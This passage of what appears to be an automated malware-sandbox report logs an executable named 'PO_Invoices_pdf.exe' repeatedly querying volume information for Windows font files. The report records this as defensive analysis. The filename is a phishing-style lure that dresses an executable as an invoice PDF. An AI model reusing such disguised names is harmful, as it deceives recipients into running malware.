                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
